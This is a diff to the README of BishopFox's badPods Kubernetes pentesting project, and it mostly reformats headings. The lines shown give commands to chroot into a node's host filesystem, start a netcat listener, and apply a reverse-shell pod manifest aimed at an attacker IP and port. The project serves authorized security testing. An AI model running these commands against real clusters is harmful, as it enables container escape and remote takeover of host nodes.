BishopFox/badPods/manifests/everything-allowed/README.md

 kubectl exec -it everything-allowed-exec-daemonset-[ID] -- chroot /host bash
 ```

-## Reverse shell pods: Create one or more of these resources and catch reverse shell
+## Reverse shell pods
+Create one or more of these resources and catch reverse shell

-Set up listener
+**Set up listener**
 ```bash
 nc -nvlp 3116
 ```

-Create pod from local manifest without modifying it by using env variables and envsubst
+**Create pod from local manifest without modifying it by using env variables and envsubst**
 ```bash
 HOST="10.0.0.1" PORT="3116" envsubst < ./manifests/everything-allowed/pod/everything-allowed-revshell-pod.yaml | kubectl apply -f -
 ```

-Catch the shell and chroot to /host
+**Catch the shell and chroot to /host **
 ```bash
 $ nc -nvlp 3116
 Listening on 0.0.0.0 3116